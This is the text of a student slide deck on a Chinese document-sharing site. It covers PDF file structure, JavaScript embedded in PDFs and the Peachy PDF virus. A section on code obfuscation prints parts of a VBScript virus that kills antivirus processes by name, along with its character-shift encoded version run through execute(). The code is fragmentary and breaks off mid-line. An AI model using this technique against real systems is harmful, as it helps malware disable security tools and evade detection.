版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
PDF代碼混淆技術(shù)pdf-obfuscationB10040529宮天何B10040606楊靜平B10040605李慧靈目錄
PDF簡(jiǎn)介
PDF文件結(jié)構(gòu)
PDF與JavaScript
代碼混淆技術(shù)PDF簡(jiǎn)介
PDF是PortableDocumentFormat(便攜文件格式)的縮寫,是一種電子文件格式,與操作系統(tǒng)平臺(tái)無(wú)關(guān),由Adobe公司開發(fā)而成。PDF文件是以PostScript語(yǔ)言圖象模型為基礎(chǔ),無(wú)論在哪種打印機(jī)上都可保證精確的顏色和準(zhǔn)確的打印效果,即PDF會(huì)忠實(shí)地再現(xiàn)原稿的每一個(gè)字符、顏色以及圖象。PDF文件結(jié)構(gòu)
(1)文件頭; (2)對(duì)象的建立聲明; (3)交叉引用表; (4)文件尾。PDF文件結(jié)構(gòu)
PDF文件結(jié)構(gòu)
——關(guān)于對(duì)象: PDF文檔是由一些稱為“對(duì)象”的模塊組成的。并且每個(gè)對(duì)象都有數(shù)字標(biāo)號(hào),這樣的話可以這些對(duì)象就可以北其他的對(duì)象所引用。 ——定義方式: 30obj << /Type/Pages /Count1 /Kids[40R] >> endobj鍵值對(duì)對(duì)象名稱結(jié)束標(biāo)志PDF文件結(jié)構(gòu)
HelloWorld文件頭PDF文件結(jié)構(gòu)
交叉引用表: 交叉引用表記錄了每個(gè)對(duì)象在內(nèi)存中的偏移地址。 文件尾: 文件尾部記錄了根對(duì)象名、信息對(duì)象名、對(duì)象總數(shù)及交叉引用表在內(nèi)存中的偏移地址。PDF文件結(jié)構(gòu)
HelloWorld交叉引用表文件尾PDF文件結(jié)構(gòu)
HelloWorldPDF文件結(jié)構(gòu)
演示: 1.將該P(yáng)DF的內(nèi)容由flate壓縮編碼改成文本ASCII編碼格式。 2.將“HelloWorld”改成“MyHelloWorld”。 技巧: 為了避免交叉引用表的修改,我們可以使用空格填充字符流對(duì)象使得該對(duì)象所占內(nèi)存地址偏移量不變。
HelloWorldPDF文件結(jié)構(gòu)
HelloWorld
20obj <</Length61>> streamBT /F124Tf100600Td (myHelloWorld)Tj ET endstream endobjPDF與JavaScript
AdobeAcrobatProfessional軟件可以使商業(yè)人士能夠可靠地創(chuàng)建、合并和控制AdobePDF文檔,以便輕松且更加安全地進(jìn)行分發(fā)、協(xié)作和數(shù)據(jù)收集。制作PDF文檔的利器,辦公必備。近年來(lái),Adobe公司一直在努力使Acrobat從一款簡(jiǎn)單的PDF軟件發(fā)展成一個(gè)完整的數(shù)碼發(fā)布平臺(tái),甚至增加了對(duì)三維圖片的支持。PDF與JavaScript
在PDF文件中可以嵌入JavaScript,例如: 80obj <</JS( //JavaScript代碼 )/S/JavaScript>> endobjPDF與JavaScript
利用Acrobat在PDF中添加JavaScript動(dòng)作: app.alert("Test"); app.launchURL ("",true);PDF與JavaScript
PeachyVirus
SecurityexpertshavefoundthefirstvirusabletopropagatethroughAdobe’sencryptedportabledocumentformat(PDF)files,aformatoncethoughttobevirtuallyimpenetrable. 目前安全專家發(fā)現(xiàn)了首例通過(guò)加密的PDF繁殖的病毒,以往這種方式是很難以理解的。PDF與JavaScript
PeachyVirus
NamedPeachybyexpertsatWebsecurityfirmMcAfeeonTuesday,thee-mailvirushidesitselfinPDFfilesandinfectsothercomputersystemsbysendingthefileasanattachmentthroughtheMicrosoftOutlooke-mailprogram. 這種叫做Peachy的病毒在周二被McAfee證實(shí)了。它通過(guò)郵件把自己隱藏在PDF文件中,并感染其余通過(guò)Outlook發(fā)送的文件。PDF與JavaScript
PeachyVirus
ThevirusexploitsafeatureinAcrobatthatcombinesotherfileswiththePDFcode. 該病毒通過(guò)Acrobat的某種特點(diǎn),將其余文件與PDF代碼進(jìn)行合并。
——摘自abcNews代碼混淆技術(shù)
代碼混淆技術(shù)是一種重要的軟件保護(hù)方法,混淆的實(shí)質(zhì)就是一種變換,通過(guò)這種變換把原來(lái)的代碼變成與其功能相同或相近的,但是更難被理解和反編譯的代碼。由于混淆技術(shù)可以根據(jù)不同的目的,不同的混淆對(duì)象采用不同的方法,這使得混淆方法非常多。代碼混淆技術(shù)
JavaScript基本常用方法: (1)字母替換 (2)[]與數(shù)字 (3)eval()函數(shù) (4)escape()函數(shù) (5)加密技術(shù) (6)隨機(jī)變量名 …………代碼混淆技術(shù)
采用簡(jiǎn)單的代碼混淆技術(shù)混淆病毒代碼。 這里將virus.vbs進(jìn)行混淆?;煜绞讲捎眉用芊绞胶蚭xecute()函數(shù)。代碼混淆技術(shù)
加密方式: 可以采用對(duì)稱加密算法(如AES、RC4)進(jìn)行加密。這里為了簡(jiǎn)單直觀,采用了古典加密方式(仿射加密,取a=1,b=1) execute()函數(shù): 類似于JavaScript中的eval()函數(shù)。使用方法為excute(Stringcode),其中code是代碼的字符串形式,效果是執(zhí)行該代碼。
代碼混淆技術(shù)
例如: execute("i=3") execute("j=i+1") msgbox(j) 結(jié)果為4。
代碼混淆技術(shù)
Functionde(x) dimp,ch,i,l p="" l=Len(x) fori=1tol ch=mid(x,i,1) ch=chr(asc(ch)-1) p=p&ch next de=p endfunction
這是一個(gè)解密函數(shù):它的效果是將字符串中每個(gè)字母的ASCII值減去1。例如:x="bcd"則,de(x)="abc"代碼混淆技術(shù)
原來(lái): CallKillProcess(ProcessNames) 可以混淆為: ss="Dbmm!LjmmQspdftt)QspdfttObnft*" ss=de(ss) execute(ss)
代碼混淆技術(shù)
OnErrorResumeNext DimProcessNames dima0,a1,a2,a3,a4,a5,ssa0="mspaint.exe" a1="ras.exe" a2="360tray.exe" a3="SREng.exe" a4="USBAntiVir.exe" a5="KAVStart.exe" ProcessNames=Array(a0,a1,a2,a3,a4,a5) CallKillProcess(ProcessNames)
a0="ntqbjou/fyf" :a0=de(a0)a1="sbt/fyf"
:a1=de(a1)a2="471usbz/fyf"
:a2=de(a2)a3="TSFoh/fyf"
:a3=de(a3)a4="VTCBoujWjs/fyf"
:a4=de(a4)a5="LBWTubsu/fyf"
:a5=de(a5)ss="Dbmm!LjmmQspdftt)QspdfttObnft*"ss=de(ss)execute(ss)代碼混淆技術(shù)
SetobjWMIServices=GetObject("winmgmts:\\"&strComputer&"\root\cimv2")SetcolProcessList=objWMIServices.Execquery("Select*Fromwin32_processwherename='"&ProcessName&"'")intReturn=objProcess.TerminateobjShell.Run"cmd.exe/c@tskill"&name_exe,0,Truess="Tfu!pckXNJTfswjdft!>!HfuPckfdu)#xjonhnut;]]#!'!tusDpnqvufs!'!#]sppu]djnw3#*"execute(de(ss))ss="Tfu!dpmQspdfttMjtu!>!pckXNJTfswjdft/Fyfdrvfsz)#!Tfmfdu!+!Gspn!xjo43`qspdftt!xifsf!obnf!>!(#!'!QspdfttObnf!'!#(!#*"execute(de(ss))ss="jouSfuvso!>!pckQsp
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 二零二五年度井蓋專利技術(shù)許可與轉(zhuǎn)讓合同3篇
- 2025年度新型建材鋼管租賃服務(wù)合同
- 二零二五年度家電產(chǎn)品銷售合同協(xié)議范本3篇
- 2025年度二手房屋買賣居間服務(wù)合同范本全新升級(jí)版
- 2025年度預(yù)制構(gòu)件裝配式建筑項(xiàng)目風(fēng)險(xiǎn)評(píng)估與保險(xiǎn)合同
- 二零二五年度跑步賽事場(chǎng)地設(shè)施租賃合同4篇
- 二零二五年度古建筑修繕泥工班組專業(yè)施工合同4篇
- 2025版民爆物品裝卸作業(yè)應(yīng)急救援預(yù)案合同3篇
- 2025年墻體改梁與裝配式建筑技術(shù)應(yīng)用合同3篇
- 2025版二零二五年度商鋪?zhàn)赓U合同租賃物保險(xiǎn)條款3篇
- 礦物加工工程基礎(chǔ)知識(shí)單選題100道及答案解析
- 2024年同等學(xué)力申碩英語(yǔ)考試真題
- 世說(shuō)新語(yǔ)原文及翻譯-副本
- 消除“艾梅乙”醫(yī)療歧視-從我做起
- 非遺文化走進(jìn)數(shù)字展廳+大數(shù)據(jù)與互聯(lián)網(wǎng)系創(chuàng)業(yè)計(jì)劃書
- 2024山西省文化旅游投資控股集團(tuán)有限公司招聘筆試參考題庫(kù)附帶答案詳解
- 科普知識(shí)進(jìn)社區(qū)活動(dòng)總結(jié)與反思
- 加油站廉潔培訓(xùn)課件
- 現(xiàn)金日記賬模板(帶公式)
- 消化內(nèi)科專科監(jiān)測(cè)指標(biāo)匯總分析
- 深圳市物業(yè)專項(xiàng)維修資金管理系統(tǒng)操作手冊(cè)(電子票據(jù))
評(píng)論
0/150
提交評(píng)論